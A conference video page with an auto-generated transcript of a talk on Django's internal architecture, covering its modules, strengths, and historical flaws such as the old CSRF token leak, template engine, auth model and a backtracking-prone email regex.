We're sorry but this page doesn't work properly without JavaScript enabled. Please enable it to continue.
Feedback

Django's architecture: The good, the bad, and the ugly

00:00

Formal Metadata

Title
Django's architecture: The good, the bad, and the ugly
Title of Series
Number of Parts
64
Author
License
CC Attribution 2.0 Belgium:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Identifiers
Publisher
Release Date
Language

Content Metadata

Subject Area
Genre
Abstract
Django has become one of the leading web frameworks over the past few years, and has become well-known in the web industry for both good and bad reasons. This talk takes a look at the internal architecture of Django, and highlights what we've cleaned up, what we got right from he start, and the dusty corners of the code that still need a bit more work - a never-ending problem in such a large open-source project.
ArchitectureBranch (computer science)Software bugCodeQuicksortSoftware developerFreezingProjective planeCovering spaceMoment (mathematics)Software frameworkComputer architectureRevision controlHierarchyRandom matrixPoint (geometry)Product (business)WebsiteStability theoryCore dumpMultiplication signMilitary baseBitProgrammer (hardware)Boiling pointSource codeFormal languageComputer animationXMLLecture/Conference
MiddlewareCodeForm (programming)Variable (mathematics)View (database)EmailAreaValidity (statistics)Library (computing)Dependent and independent variablesQuicksortTemplate (C++)Functional (mathematics)CodeFront and back endsSoftware frameworkTransport Layer SecurityPasswordMoment (mathematics)BitMereologyWeb 2.0Generic programming2 (number)Core dumpHookingUniform resource locatorSet (mathematics)Multiplication signKeyboard shortcut1 (number)Endliche ModelltheorieAuthenticationReflection (mathematics)Formal languageoutputLogicDatabaseSubsetAbstractionModule (mathematics)Lecture/Conference
Control flowFile formatVirtual machineSerial portWeb pageKey (cryptography)Reading (process)Message passingCurvatureData storage deviceQuicksortServer (computing)DatabaseImplementationMobile appComputer-generated imageryLocal ringHTTP cookieEmail1 (number)Semiconductor memoryNumberComputer fileCartesian coordinate systemData managementGUI widgetHuman migrationCuboidCodeRelational databaseType theoryMiniDiscSoftware frameworkMathematical optimizationPhysical systemFAQInternationalization and localizationFluid staticsAuthorizationState of matterCache (computing)BitLine (geometry)Front and back endsField (computer science)AuthenticationPattern languageCore dumpEndliche ModelltheorieSoftware testingCASE <Informatik>HypermediaRight angleTask (computing)System administratorAbstractionInterface (computing)Projective planeVideo game consoleLevel (video gaming)WordSequelSampling (statistics)Table (information)Independence (probability theory)Metropolitan area networkWeb syndicationDifferent (Kate Ryan album)Software developerPolygonCycle (graph theory)Flash memoryLecture/Conference
Electronic mailing listForm (programming)Uniform resource locatorSoftware frameworkContext awarenessEndliche ModelltheorieTemplate (C++)BitType theoryView (database)CodeDatabaseCross-site scriptingQuicksortMeta elementSet (mathematics)Social classGoodness of fitResolvent formalismLatent heatCodeoutputFront and back ends1 (number)Ocean currentGUI widgetSystem administratorIntegerAreaSelectivity (electronic)Multiplication signField (computer science)Functional (mathematics)Software testingVector spaceWebsiteValidity (statistics)MereologySampling (statistics)Line (geometry)Web pageObject (grammar)SequelError messageVolumenvisualisierungImplementationCore dumpCuboidInfinitySoftware developerWeb 2.0Mortality rateClient (computing)MultiplicationOptical disc driveRegulärer Ausdruck <Textverarbeitung>Cartesian coordinate systemServer (computing)Case moddingLoginDifferent (Kate Ryan album)Module (mathematics)MaizeWrapper (data mining)Computer-generated imageryLecture/Conference
WebsiteSoftware testingVideo game consoleSystem administratorEndliche ModelltheorieSoftware developerExtension (kinesiology)Gastropod shellClient (computing)WebsiteSequelMultiplication signLecture/Conference
Endliche ModelltheorieDean numberDifferent (Kate Ryan album)AbstractionKey (cryptography)LaptopPartial derivativeLine (geometry)Local ringPoint (geometry)Block (periodic table)Object (grammar)EmailComputer configurationBookmark (World Wide Web)Bit rateSoftware frameworkEvent horizonEndliche ModelltheorieMereologyDatabaseQuicksortPolygonFront and back endsAreaRectangleGeometryFormal languageWebsiteRelational databaseQuery languageSequelSampling (statistics)Object-relational mapping1 (number)Set (mathematics)Sign (mathematics)HTTP cookieComputer fileInheritance (object-oriented programming)Rule of inferenceLecture/Conference
Software testingPoint (geometry)System administratorInterface (computing)Endliche ModelltheorieMobile appForm (programming)Web pageFormal languageAxiom of choiceJava appletWebsiteReflection (mathematics)Multiplication sign1 (number)DebuggerGastropod shellToken ringQuery languageWeb applicationFunctional (mathematics)Regulärer Ausdruck <Textverarbeitung>Filter <Stochastik>Closed setContext awarenessGoodness of fitSoftware bugAuthenticationBitDirection (geometry)View (database)FlickrCore dumpUniform resource locatorLevel (video gaming)Projective planeScaling (geometry)Cartesian coordinate systemSpacetimeSheaf (mathematics)MultiplicationDatabaseDifferent (Kate Ryan album)Real numberPatch (Unix)Right angleWeightMereologyCASE <Informatik>CodeTable (information)Software frameworkDependent and independent variablesSoftware developerCross-site scriptingContent management systemScripting languageQuicksortGreatest elementInformation securityPiInteractive televisionConstraint (mathematics)Client (computing)Event horizonTemplate (C++)String (computer science)Perfect groupSocial classValidity (statistics)Fitness functionChemical equationSystem callMathematicsWritingVolumenvisualisierungDynamical systemMiddlewareMappingVisualization (computer graphics)Data managementBit rateElectronic mailing listLecture/Conference
Maxima and minimaPlanningDifferent (Kate Ryan album)Regulärer Ausdruck <Textverarbeitung>Core dumpFormal languageResolvent formalismBoolean algebraCodeRight angleNamespaceAreaBitModule (mathematics)Keyboard shortcutParsingTemplate (C++)Endliche ModelltheorieMereologySet (mathematics)ImplementationVolumenvisualisierung2 (number)Extension (kinesiology)Profil (magazine)DiagramConstraint (mathematics)Denial-of-service attackCartesian coordinate systemQuery language1 (number)Multiplication signUniform resource locatorOpen sourceLengthSoftware bugGreatest elementVulnerability (computing)Projective planeEmailQuicksortVariable (mathematics)MIDISingle-precision floating-point formatTelecommunicationRevision controlAddress spaceString (computer science)Mobile appSoftwareFreewareSoftware developerData miningDomain namePosition operatorAuthorizationSoftware frameworkWebsiteField (computer science)Web pageEvoluteParsingState of matterError messagePasswordAttribute grammarMathematicsToken ringSoftware testingGoodness of fitType theoryRow (database)Human migrationValidity (statistics)Wave packetInformation securityExpressionFilm editingNegative numberEqualiser (mathematics)Cache (computing)Point (geometry)LogicPlastikkarteLecture/Conference
Lecture/ConferenceXMLComputer animation
Transcript: English(auto-generated)
All right, thank you for coming. I'm Andrew Godwin, and I'm gonna give you a talk on Django's architecture, the good, the bad, and the ugly. I'll cover exactly what that means in a few short moments. But first of all, just an introduction to myself.
I'm one of the Django core committers. I have been working with Django for about three years. I became a core committer last year. I am at various times either a freelance or mercenary programmer, as I like to call myself. And also, at the moment, I'm sort of founding a startup, apparently. It's more a project that evolved.
So first of all, I want to start off with a brief history of Django, how it's evolved, where it's come from, if you're unfamiliar, which a lot of people are. So Django started off at the Lawrence Journal World in Lawrence, Kansas, in 2005. A team of three developers and one designer
sort of built Django internally for use with a few sites the world's company was building. They were a very newspaper site. They were quite CMS-y. But it was still quite a generic framework. And so they decided to publicly release it the same year. And so they weren't expecting much reaction, but the sort of reaction they got overwhelmed them.
The oft-famous quote is that in 2006, Jacob, one of the first few developers in Django, famously quoted that Django 1.0 is just around the corner. A mere two years later, they finally got to 1.0 after rewriting about half the code base. Since 1.0, we've had basically an API feature freeze
or at least backwards compatibility. So any feature you want to get rid of has to have at least three versions of deprecation. So it's quite stable now. Before 1.0, it was anything goes. A lot of people were running off of the main branch of subversion for quite a while.
I think there was about one and a half years, between stable releases at one point. And there were many, many production sites just running off of the development branch. So it's nice we finally have some stable releases again. Release 1.3 is coming up in a few weeks. It's more of a minor bug fix release this time. Since 1.0, we've added a few big features.
1.3 is a little less, but we still start to snuck some sort of major features in. But generally, it's sort of progressing nice and stably these days. So one of the main things about architecture is how things are architected. So first of all, I'm gonna go through
how Django is basically laid out in the code base. For those of you who aren't familiar with Python, it should be pretty obvious how things work. There's modules, it's like most other languages. They're hierarchical. And then after that, I'm gonna go through some of the more interesting points of the Django code base in architecture. Some of them are good. Some of them used to be bad and fixed them,
and some of them are still a bit ugly, and we're going to try and fix them soon. So Django is, as you can imagine, for a large web framework, a very complex beast. This is a subset of the top-level modules in Django. These are the main important ones, though.
So going through them alphabetically, contrib is where we keep all of our optional add-ons. So Django's philosophy is that anything that doesn't have to be in the core is in contrib. You can disable it. So use authentication, sessions, all that kind of stuff are in there. I'll go over that in more detail in a second. Core is where all the absolutely essential part of Django is, things like URL resolving,
basic functions and handlers. DB is our model's backend for calling databases. It's an abstraction layer. I'll go over that again in a minute. Dispatch is the signal handlers. So Django has signals, which are sort of, you can register hooks into signals. So you can say, when this model is changed,
run this function. So you can do custom save hooks, custom validation, things like that in sort of that kind of area. HTTP is our HTTP handling libraries. It does things like recognizing status codes, performing correct responses, mind handling, that kind of stuff. Forms is the forms library.
Django has had two forms libraries, one called old forms now, one called new forms. This is new forms in 1.3. Forms is a sort of generic way of writing user input forms. So both simple forms like name, email, password, and more complex sets of, there are at least three sets of name, email, password. They all have to be present.
There has to be at most five. It can get quite complex. Middleware is where Django calls middleware lives. If you aren't familiar with the concept from Whiskey, then it's basically code that runs around a request. So you can insert the incoming HTTP request and set custom variables. You can change the headers.
So you can do authentication. You can do CSF protection. And then on the response, you can do things. So you can gzip, for example, the response. You can do various things like that. Shortcuts is full of some handy bits because Django can get very complex in its import paths. So there's things in there to sort of just render me a disk template into a response and things like that.
Templates is where the Django templating language lives. The Django templating language is quite an odd beast. It's designed mostly so that you can't do much logic in it. For a very long time, it was designed very much this way. We're slowly sort of weaning off of that at the moment.
And it's, I'll come onto that later. It's quite interesting and it's probably one of the oldest parts of the code base that hasn't been touched very much. And then finally, views, which is where all our generic views live. And in the latest release of Django, we've introduced something called class-based views, which are sort of a better framework for running views and all that code lives in there.
So Contrib is, as you can see, even more in-depth than the main level three. So these are the main Contrib apps. There's about six more of them. I'll go through some of the more interesting ones later with some pictures of how they work. But admin is Django's famous, magical administrator interface where you can edit code.
Auth is our user authentication system, the subject of much debate. It works very well out of the box for small applications. Comments is a bit of an odd commenting system that was great when it was invented and is getting a bit out of date now. Content types is a way of doing generic foreign keys to other things.
So you can link to arbitrary tables and models. It kind of breaks relational database conventions a bit, but it can be very useful for things like comments, which it lives next to. Flat pages is a very simple way of just having database pages. So you can say things like an about page and an FAQ page, you can just have them. It's, again, not very complex.
The idea of Contrib is it's very simple implementations of very common patterns. That's the definition of it. Giz is one of the more interesting ones. It's Django's geospatial support. So you can do arbitrary polygons, you can do testing of lines in lines, you can do projections, you can do all sorts of exciting things.
I've got some stuff on that later as well. Humanize is full of things for apping numbers and sizes humanity uses. So you can do things like putting commas in numbers, changing numbers to words. Local flavor is full of things that are for localization as opposed to internationalization. So for those that don't know the difference, internationalization is translating words.
So you can, for example, rather than saying, hello, Andrew, you can have bonjour, Andrew. Local flavor is different to that in that it's localizing what you put in. So in the UK, we'd have a post code. In the US, you have a zip code. Also things like telephone numbers vary from country to country, and there's other things as well.
So things like the US state fields are in there because they're only important for the US. And so most large countries have an entry in local flavor with some custom widgets for their country. So if you're building an application for, you know, something that isn't based on either the UK or America, which a lot of people do here in Europe, you can actually do it sanely, which is helpful.
Messages is a way of doing sort of messages for upcoming things. So I think in Rails they call this flash, but the idea is you can save somebody, say, tell them it's been saved, and then the next page along can look at the messages and go, oh, look, it's been saved. Sessions is our support for sessions because obviously HTTP is stateless.
So that just has cookies and it stores things in other database or cache backend. Static files is new in 1.3. Django used to just tell you to do your own management of CSS and images and things. These days, we've decided to move in in this release, support for managing those more sanely. So the idea with Django is that you can have
these third-party reusable apps, and it used to be the case that you had to take their media they shipped with, their CSS, their JavaScript, and move it into the right place with static files. Django will automatically take all of that media and put it in the right place for you. And also, there's syndication, which is our support for RSS, Atom,
and those other kind of feeds. Core itself has a few other things inside it. Namely, there's the cache, which is our cache backend. The cache backend is somewhat abstracted. I'll talk about that in a bit. There's files, which is support for uploading files
and handling on disk files. There's various optimizations there, so small files only if you get stored in memory, and large files get pushed onto the disk when they're uploaded, so you don't use up all the memory of a gig file being uploaded. Handlers is full of support for things like talking to ModWhiskey, talking to ModPython, all the various ways you can run Django.
I believe there's also fast CGI support in there as well. Mail is the sort of abstraction layer for emailing people. It used to be fixed. These days, you can have emailing support for SMTP. You can have one that prints the console, so you can debug and see what would be sent. And there's a few other things in there as well.
Management is support for Django's idea of management commands. So management commands are things where you, basically you can say this is a task that people can run. So you can say import data or that kind of stuff, and you can define these per application in Django. So if I ship, so for example, I write an application called South, which does database migrations for Django.
So I can ship lots of management commands, which do things like run migrations, let you sort of half create migrations automatically, and those are all my management commands, and the framework for one of those lives in there. Serializers is our support for reading and writing out JSON and XML, and one of the format, I forget what it is, for models.
So rather than dumping SQL, you can dump a database independent format. It's not particularly efficient, and it will fail on large databases, but for moving stuff around in development, when often you're using perhaps SQLite on one machine or Postgres on another, it can be very handy. Servers is where the implementations of the two actual web servers Django has in it are.
So there's a very small debugging web server, so you don't have to have Apache or Mod Python or Gun and Corn is still locally, and there's also a fast CGI wrapper in there which counts as a server. Paginator, for some reason, lives in here. I'm not quite sure why it does, but that supports basically taking a list of things and having pages of it,
which is obviously used a lot in most websites. URL resolvers is our URL framework. In Django, URLs are a set of regular expressions. It reads through them top to bottom, and then the first one that matches, it takes and fires the view connected to that. And then validators is new in 1.2, where we have model validation.
So what we used to do is just have forms validate input, and then when you tried to save something, the database would just die if it's the wrong type. So if you incorrectly had a character field on your form, when you saved to an integer field, then the database would just die horrifically and go, no, that's wrong. In 1.2, we introduced the idea of model validation.
So now models also validate things when you put them in and you get sensible errors rather than the occasionally cryptic MySQL or Postgres errors, which can often be quite confusing. The database backend is split into essentially two parts, backends and models. Backends is where all our database-specific code lives. So there's backends for MySQL, Postgres, Oracle,
and SQLite in core, and there's also Microsoft SQL Server, Fireburn, a few other ones available as third-party applications. They don't have to live in here. This is just the ones we ship with. And then models is the sort of, the layer goes on top of that. So backends gets rid of all the specific stuff like what types to use.
And models is a sort of, so in Python, we have metaclasses and things so you can do things declaratively, and that's where all that magic lives. It's not as magic as it sounds. There's many other parts. I could spend all day going about every module we have in our code base, but if you're sanity, I won't. So here's a few interesting ones.
We have decorators for views. So if you're unfamiliar with Python, again, decorators are the concept of a function which wraps a function. So basically, because in Python, function's the first class object. You can take a function, mutate it through a different function, get a different function in return. They get complex. But the idea is you can wrap a function in, this must be done by an admin,
this must be done by a logged-in user, or various other checks like that. And some common ones live in there. Generic views contains some simple views. So a lot of sites do things like render a simple template, render a model to a template, render lists of models, and there's common code for all those kind of things that lives in generic views. So you can take them, sort of your generic site,
and just pull it over there, and have all that code written for you. CSRF is our cross-site request forgery protection. Cross-site request forgery is one of those attacks, vectors on websites that isn't very well understood. It's very important, and it can mean your users can get very nasty things done to them.
Django ships with full support for CSRF. We have done it for a long time. And I'll cover that again later in a bit. That's been upgraded recently to be less evil than it used to be. Test is a testing framework, which is very important. You can do testing, there's custom test handlers, you can, there's a custom test client where you can do fake requests to Django,
and you can do things like assert that a template's been used, and look in the context of templates and things like that. There's also the forms, which forms is arranged into this idea of widgets. So a widget could be a text area or a select box. Fields, which then use one of those, they have types. So for example, if I had an integer field, it'd probably use a text area,
or could use a text input. You can have multi-select fields and things like that. Form sets, which is this idea of having many things, so you can have up to four users, or you can edit a list of things. And models, which is our support for introspecting models and making forms automatically out of them. So if you have a model, we can read the field types and look at what it is.
But basically, since 2005, literally every piece of code in Django has been changed. There's very little left from the original release that hasn't been touched by somebody. In some places, this is because the original code was a bit odd. In other places, it's because requirements have changed over time. And in other places, it's because
we've just expanded on what things can do. But the main crux of this talk is to go through what I think some of the good bits of Django are, some of the bad bits, and some of the really horrible bits that just should never have been in there in the first place. And also, as I said before, some of these often are historical and we've fixed them, but I get to talk about them here
because we've fixed them and I can sort of gloat. Other ones of these are current issues in Django that we have yet to fix, because we don't have infinite time and infinite developers. Yeah, there we are. The nasty bits, I promise, will be fixed soon. You know, just don't attack me.
So, the good things. The main crowd-pleaser in Django is the admin. A lot of people, when they first come to Django, the idea they can write about 20 lines of code for a model, add two or three lines for an admin, hit go, and then this big page appears that lets you edit things straight away. That's very handy. The admin is often not used as-is on end user sites,
although it is a lot of the time, but even in development it can be a lifesaver because you can edit your test data, you can do all that kind of stuff really easily without having to fiddle around in a SQL console or a Python shell. I can't tell you how many hours or days
the admin has saved me over the past three or four years working with Django. Just being able to visually edit and fiddle with my models. And also, a lot of clients are quite happy with the admin, it provides, it's quite sensible, it's quite clean, it doesn't do very much, but there's lots of extensions for it. The model layer.
This is an often derided part of Django. People often say, well there's lots of other abstraction layers for Python, for databases, there was SQL object, it's not so much anymore, there's SQL alchemy, there's lots of others. But Django has a different philosophy. First of all, we call it the model layer, it's not an ORM, it's not specifically designed
to deal with relational databases, and there is partial support for things like MongoDB in there as well. It is very much an abstraction away from that concept. Obviously relational things do leak through, they have to, following keys are in there, but we like the simplicity and the way it's designed.
And also, back in 2005, there weren't that many other things around. People often forget that. Django is full of sensible abstractions, so one of the things a lot of other places often don't have, or perhaps younger frameworks or other frameworks or different languages, is the option to opt out of having
database backed sessions or other things like that. So not only is there a session different back in, so for example on larger sites, you want your sessions to be in a big, something like memcache, or you want to be in signed cookies, which is even more scalable. Caching, there's memcache, there's redis, there's on file, there's in database,
there's all sorts of options for that. Email backends, we've just changed, so you don't have to send by SMTP anymore, especially if you're on local blocks developing, then you may not have SMTP support, your laptop may not know what sendmail even is, so the idea of printing to console rather than sending email and things like that
is really handy. GeoDjango is one of my favorite parts of Django. It was co-opted into Django only just before the 1.0 release, it used to be a separate project, but for those who aren't familiar with geospatial editing, GeoDjango lets you define areas or points or lines, so for example areas can be counties
or administrative regions or countries, lines could be roads, and points could be places. And the idea is that you can define models like you usually do, so I can say here's some lakes, they have a name, they have a rate, which is their rate of fill,
they have a geom, which is their actual polygon, and then the object's line is so it knows how to do geospatial queries, and then we can say, get a lake with ID3, and we can then ask for if this lake contains itself, which it does, and not only can you do this, you can define areas, so I could get the polygon of the USA
and say, tell me all the lakes are inside this polygon, and then postGIS, which is the post-gres crawl GIS backend, my SQL has basic support for rectangle ones, and a few other backends can take that query, pass it quite efficiently, and return me, quite quickly, all the lakes are inside the USA. Again, you can do it with points,
so I can ask for all events that have happened inside London, and it will just give me all the things that are inside that area. It also gives you a very nice admin interface for editing these, so if you're unsure where South Africa is, you can pop up in the app, the model admin, and say, oh, that's South Africa, and you can also edit them and pull the points around and various things,
so you can change what things look like, and it's very useful for testing. Django has some very good debugging tools, so not only do we have manage.py shell, for those unfamiliar with that, that launches a Python interactive shell, or a REPL, inside your Django project, so you can import your models,
you can play around with them, you can test out your functions, you can test out your filters, or do all this kind of stuff. We have good testing tools as well. Django has a very strong testing community. People are often derided for not doing tests, and there was, in fact, a Django Dash project two years ago that, I think it was called Django Pants,
for some reason, that took applications on PyPy, downloaded them, and then see how many tests they had and checked their coverage, and gave you a rating from A to C, which was quite nice. But Django has quite a lot of testing tools. It has a fake client, so you can do fake requests against your application and see what comes back. And so rather than just testing that it returns 200 OK,
you can test that, if I asked for the page about ponies, it uses a ponies template, it returns a context with the right things in it, all those kind of things. And also, as I said, the culture of debugging and testing around Django is very good. Not only does Core Django have this idea of testing,
and every single bug we have must have a test that proves it's been fixed. But there's also third-party tools for debugging and testing, and things like Django Debug Toolbar, which show you on your site what's been going on. The new CSRF collection is nice. I had to qualify the new one, because the old one is in my ugly section, as I'll tell you later. So the new CSRF protection is very nice.
You can do a form, say put a token here, and then a middleware will check automatically all your posts are protected. A quick introduction for those that don't know what CSRF is. If your application has a post view, so if you say, if you post here, we'll delete something,
then evil.com can have a form that posts to the right URL on your site. And if the user's logged in, it can just sort of auto-post that in an iframe in the background, and just start deleting stuff over here. So with CSRF, the idea is that you have tokens, and so whenever your site makes a webpage, it puts a token in its form, so it can prove that the form
that's being submitted came from itself. So I'll go a while later, though that's very important, that's the case. But the new one is quite nice, and you can turn it off optionally on different parts of the site. The old one has to be on or off globally. The new one, you can say it's on for the admin and off everywhere else. Auto-escaping, this is a major introduction of Django
about 1.0, was the idea that all strings and templates are always escaped HTML inside them, unless you say otherwise. So this immediately stops a lot of cross-site scripting attacks in their footsteps. It's not perfect security design, it won't fix all attacks, but it really does help stop a lot of people new to Django
or people who are sort of coding in a hurry, have deadlines, and it makes you feel safe about your code, you know that if you render this variable, it even takes a script tag, nothing will happen, it should just show script. So that's really handy. And we managed to introduce it in a nice, mostly backwards compatible way.
The Vue API simplicity is something that some of the core committers are very happy about. In Django, a Vue is just any callable that takes a request and returns a response. It doesn't matter what it is, it can be a function, it can be a class with a call method in Python, it can be something else. But the idea is that anything that does this is fine. So Vues are traditionally in Django,
they're functions, so you choose def, but recently we started having class-based Vues, so you can have a Vue, you can then inherit from it and inherit most of the behavior and use the sub-methods, but you can change little bits of the behavior as well. So if I inherit a list view, I can change sort of the query set it uses or the filters it uses for the models, but then get all the other code for free
rather than rewriting it in a new function. And this kind of flexibility in Django is very key. We really do like the idea that we're not imposing one particular way on people, but we generally try and push you in the right direction. Python, I think, was a good choice. Obviously, I'm biased here. There are many other good languages as well,
but compared to something like C or Java, it's a lot easier and quicker to write things in dynamically. I'm sure other not answers are fine, but I like Python, so I'm allowed to do that. Multiple database supports are very nice. This came in Django 1.2, and was in fact brought about at the first DjangoCon. Cal Henderson, one of the founders of Flickr,
stood on stage and did a talk called Why I Hate Django, which was fantastic. We have a tradition in Django, having talks and conferences of why I hate Django. There's one every year. It's very important. And of Cal's points, his major point was that there was no support for more than one database. In Django 1.0, you connect to one database and that was it.
There was no support for a lot of different ones for really different ones to write. And at sites at big scale, you want one database to write to the master, then you read from the slaves and various other different things as well, or sharding by different kinds of table. And so, multi-TB is a very important thing. It's very nicely done. It's not noticeable at all if you're using my database.
You'd never know it's there. And as soon as you want it, it turns up and you can do things with it. It's not very complex. It's got no built-in support for sharding or any kind of sort of read-write balancing. But the idea is that if you're doing that stuff, you're probably quite large and you can afford to do it correctly yourself. Anything we shipped wouldn't fit for most people.
It's probably, you know, we'd rather you do it the right way for you rather than shipping some code that worked all right half the time. We have a very small actual core. You can turn off nearly all of Django, the admin, the authentication, the sessions, all that kind of stuff, and be left with basically just URL resolving in a view handler. Not many people do. I've done it once in the past,
but it is quite nice that you can turn off bits. The admin especially is useful to turn off if you've got your own admin. Sessions, useful to turn off if you're doing a stateless website to save some render time. Instantization can be turned off if, like me, you do mostly English sites. I do do some instantization ones. And, you know, it's nice to have that kind of flexibility.
And finally, documentation I think is very important. We have very good documentation. It's very extensive. It's not that well organized perhaps, but there's a lot of it there. And there's a culture of documentation. If you submit a bug patch to Django, it will not be accepted until it has documentation for what you've added,
if it's any new features, and a test, which means that any new features that get added always have documentation. And in third-party applications, if you don't have that documentation, you're derided. It's a big, strong thing. We like to make sure that people know how to use this stuff. It's all very well having all these cool programs, but unless people know what to do with them,
it's not very useful. Oh, that wasn't the finally. This is the finally. Or possibly not. The community I think is very important. Django has a very strong community. We've had three years of conferences now. They keep getting bigger. We have to keep moving to different hotels and making them bigger. And there's a very strong sense of community. We have lots of third-party applications, lots of people using it, lots of tips.
And generally, and they're really friendly as well, and it's nice to have a community. And it also means that the core development team can grow bigger, we can get more stuff done, and it can generally be quite good. Django is also not too high level. We don't take one method of doing stuff and impose it.
So not that I'm saying it's a bad idea, but certain CMSs, things like Drupal, for example, impose a certain way of doing things. And in Drupal, you basically, you start off with your thing and you sort of edit down and pare away things. In Django, you start at the bottom and you build up. For things you do in Django that aren't necessarily just content sites, this is fine.
If you want a content management system, there are ones built on top of Django. But Django is more a framework for general web applications. If you're doing a site that has mapping along with visualizations with some snazzy stuff, then you can sort of build them up and choose the right part from the start. And I think that's really nice. Now, the more interesting part, the bad. This is much more interesting.
So the old CSF support was fascinatingly awful. So as with most bad parts in Django, it used regular expression. And basically, it looked for the last tag. Well, it's not very good here. There's the last form tag, the closing form tag in any form.
It took that and it replaced it with a CSRF token and the close form tag, which is all fine. So every form on the page gets a token saying what it is. That's all well and good. However, also, for forms that posted outside the page, say to evil.com, as in this example, it also included the token. This is not good because that means evil.com has a token
that's valid for that user on your site. So they can then take that, post directly back to your site, and do a CSRF tag. And if using the admin, that means they can post to slash admin slash core slash user slash delete or something, and then start deleting your admin users or even post their own admin user or various other things.
So thankfully, this was got rid of eventually. You can still turn it on. It's called legacy now. There's a very large warning with the documentation saying don't do this. It's probably very stupid because you can get attacked by evil sites. But if you don't post outside your sites like the first people who did this didn't, it's fine. Sema changes has always been a problem in Django. In Django, when you make a new model,
you've unsynced DB, a new table appears, everybody's happy. If you add a new column, if you delete a column, if you change the constraints, Django itself just goes and doesn't do anything. So luckily, I've been fixing this for the last two years by writing an external third party application called South. There are other ones too, demigrations.
I forget some other ones. Django Evolution did the same thing. But I think this was kind of a mission from Django at the start. Adding columns and deleting columns is something I do a lot. My schema doesn't start off fixed in stone. It presumes you add like a UML diagram and then derive your models from that. Whereas I just sort of sit there hacking about models,
changing types of fields, adding constraints as I go. So I think the lack of that was a bit bad. The plan is hopefully to get some parts of schema changing into Django in a release or two releases time. But there's no fixed timeline or feature set for that. So I have to wait and see. The template implementation is dodgy.
So those of you who've done parsing of languages know that you have a tokenizer or lexer and then a parser, basically. Django's tokenizer is two regular expressions and its parser is basically non-existent. It can't cope with any kind of nesting of comments or anything.
It's also not very efficient at doing includes. It doesn't compile templates, just interprets them. It's generally quite slow. One of the old big sites that used Django before they went away had about 200 includes in every template page. And they only took about one and a half seconds sometimes. So it's really not brilliant.
It's kind of been bolted on and patched around, so there's now a caching template renderer. But that's kind of not really the solution to the problem. There has been discussions of possibly improving it a bit more inside. But the problem is it's very hard to change while still being 100% backwards compatible. Which of course, Django is very important. Because people rely on us not to just change things
underneath their feet and that means they can't upgrade. But hopefully we'll fix that soon. Ah, the ugly, even better. Magic. Django, when it was first released in 2005, had a lot of magic. You define models, they magically appeared over here in a different name space where you imported them from. You define template tags, they magically appeared over here.
This wasn't pretty good. People didn't know how things appeared. You couldn't trace them back very easily. If a model just appeared in Django.meta, you actually had no idea where it came from. And so there was a very popular thing called the magic removal, where all the magic was taken out of Django, most of the magic. So these days it's a lot better.
And you can tell where things come from. You can easily trace back areas to where they actually came from rather than some other module. But that was quite nasty for a while. Too many regular expressions. I love regular expressions, but they can get a bit long. So there are several very long regular expressions in the core Django code. The URL resolver has one.
The random regular expressions, that's probably fine. Not sure it should, but that's generally accepted to be all right. But one of our most recent security vulnerabilities in sort of mid last year was the email regex. So this is our email regex. The top one is vulnerable to a DDoS attack.
The bottom one is not vulnerable to a DDoS attack. If you can spot the difference, the difference is actually this clause here, which limits the length of this particular query. If you don't have that there, your regular expression does backtracking. And the longer the domain string you put in, the longer it takes.
If you put three or four hundred characters in, the top one would run for several minutes and just die. So yeah, the problem is, and we spent a good three or four days on and off trying to look at what the hell was wrong and how to fix this because it's not particularly editable. But yes, so I personally think we should have,
for an email validation, does the string contain act? Yes, it's probably an email. Because we can't test whether there actually isn't a valid email at the end of that address. Let's just test whether it looks like one. And most users, most errors are gonna be typing usernames in their web addresses. And I just think getting this kind of checking
is a bit excessive. Also, it only allows the main TLDs that are six characters long. So if you have, so .museum is fine, but if you invent a seven letter one, all the old versions of Django aren't gonna work. So yeah, not brilliant. Auth is a big bugbear of mine. This is like a personal vendetta thing now.
So auth inside Django is fixed. So it's fixed to having a first name and a last name, which is already stupid for internalization. First name and last name is a very Western thing to start with. It's fixed to having a single email address and a password. The email address is required, as is the password.
And it's also fixed to having a few other attributes. And you can't change this. You can't go to Django and go, I also want an age field, or I also want a URL of a website field. You have to make a different model and link it in. And there's no way of getting rid of auth and doing your own one without completely removing it, because you can remove it, and making your own one, and then replicating all the same API
or writing your own code that uses a different API. And there's been some discussion about how to make this better. There's been the idea of extendable models, but doing that in a way that's not crazy is very difficult. We don't want much crazy, crazy is bad. So it's a difficult problem, and it's a bit ugly, because you end up with these one-to-one relationships
that really should be one table of like a profile model. There's even a hack where you say, this is my profile model, and Django adds special shortcuts to get it from a user. But it's just a workaround of the problem. The old template language was fascinating. So rather than having an if tag that just did equality, less than, greater than,
nah, that was bad. The if tag just did Boolean testing, it took one variable. If you want to do equals, there was an if equal tag. That's fine, right? If equal AB. You want to do not equal to, yes, do if not equal. And in Django, every tag ends with an end tag name. And so if you want to do lots of negated equal expressions, your code with the template is littered
with ends and if not equal, which is not the best way to do ifs. Thankfully, in 1.2, we introduced, was it 1.3, 1.2, we introduced smartif, which actually do such modern things as double equals and less than and things like that. But this is a, you know, the template language shouldn't have that much logic, but I think that's going a bit too far.
But the question thing here is, you know, Django has a lot of problems. We've had a lot of them and we've solved a lot of them as well. Are there lessons to be learned here? Not really. When Django was initially released, it had a very different purpose to what it does now. It was on a few websites in house. It worked fine for those.
And in fact, it worked well enough that people were impressed by it and really, you know, really got some infused by how good it was. But I think every framework and every software application develops over time. And you get the horrible bits of code and regular expressions that you can't debug lying around. But I think in general, you know,
you have to realize that for a project, not everything needs fixing now. I know a lot of people who just sit there and refuse to release software and it's perfect. Software is never perfect. I think we all know that. Open source software is never done. And if we sat there and didn't release to all those problems I just thought I'd have fixed, Django 1.0 still wouldn't have happened
five, six years later. So, you know, it's one of those things. And I, you know, from what I've seen for the last three years, you improve by being consistent, sometimes even at the expense of being a little ugly or a little bad. In the end, yes, template language is up to you, but it's been the same for three or four years
and you can still use it and your application is still mostly wrong. Don't get carried away by writing new features. We got carried away for a while. That was bad. Lots of bugs piled up. We're fixing that now. But yes, new features are great, but they're only great if the old ones still work at the same time. And also, people with lots of free time. It's very handy for an open source project.
We, for a while Django had a bit of a lack of work resources. Thankfully it's mostly improved now. But don't, you know, never underestimate the amount of developers and resources you need. Especially if you think you're all right. Remember, it takes a few months or a few years to bring new people into the fold and get up to speed.
And by the time you get there, you may realize you've been a bit too late. So, thank you for that. I hope you've learned something from this. If not, then I'm sorry. Feel free to ask any questions. I'm happy to defend my position. And thank you very much.
Any questions? So Google App Engine is using a quite old version. I think it's 0.96.
